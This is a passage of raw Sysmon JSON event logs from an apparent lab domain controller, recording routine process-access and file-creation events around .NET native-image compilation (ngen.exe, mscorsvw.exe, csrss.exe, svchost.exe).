0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.403","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-00103C8F1300}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.419\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-00103C8F1300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.419","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-00103C8F1300}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.465\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-0010C1921300}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.465","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-0010C1921300}","TargetProcessId":"4584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.465\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-0010C1921300}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.465","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-0010C1921300}","TargetProcessId":"4584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.481\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-0010C1921300}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.481","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-0010C1921300}","TargetProcessId":"4584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:06.747\r\nProcessGuid: {A837DB8D-0522-5F25-0000-0010C1921300}\r\nProcessId: 4584\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\11e8-0\\System.Net.Http.dll\r\nCreationUtcTime: 2020-08-01 06:01:06.747","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:06.747","ProcessGuid":"{A837DB8D-0522-5F25-0000-0010C1921300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\11e8-0\\System.Net.Http.dll","CreationUtcTime":"2020-08-01 06:01:06.747","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.794\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-001087961300}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.794","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-001087961300}","TargetProcessId":"3544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.794\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-001087961300}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.794","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-001087961300}","TargetProcessId":"3544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:06","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:06.794\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0522-5F25-0000-001087961300}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:06.794","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0522-5F25-0000-001087961300}","TargetProcessId":"3544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
